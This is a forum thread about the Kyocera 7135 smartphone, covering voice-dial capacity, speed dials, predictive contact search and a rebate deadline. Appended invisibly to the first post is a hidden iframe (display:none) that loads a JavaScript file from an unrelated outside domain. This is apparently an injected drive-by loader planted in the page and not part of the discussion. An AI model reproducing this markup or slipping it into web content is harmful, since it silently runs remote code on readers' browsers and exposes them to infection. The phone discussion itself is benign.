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I am seriously considering returning my Samsung i700 for the 7135 because I need a phone first, then a PDA (for keeping appointments and contacts only). Anyway, how many numbers can you store in voice dial. I checked the manual and it doesn't say. Please help! Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
 
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I don't have a 7135 yet, but I think I read somewhere that you can store 25 voice and 99 speed dials... I may be wrong though... I think you can also dial any number in your Palm Address book...

I hope to be getting my 7135 this weekend... Definately before the rebate ends on the 11th!
 
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I talked to tech support at Kyocera and after holding for a few minutes they said that it was 30 names for VAD. The 99 speed dial is correct.

Now what I need to know is if it has predictive text input so that if you wanted to call the contact "Buddy" you would press 2 (for the B) then 8 (for the U), etc. until you got the right contact. Cheaper Kyoceras have that feature and I love it!

I don't even get the full 15 days to live with my i700!! I didn't realize the rebate ended on the 11th! That's only a week!!!
 
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I believe it does... check out the interactive tour on the Kyocera site. It's done very well. I think they cover it on the tour.

http://www.kyocera-wireless.com/7100_phone/7100_phone_series.htm
 
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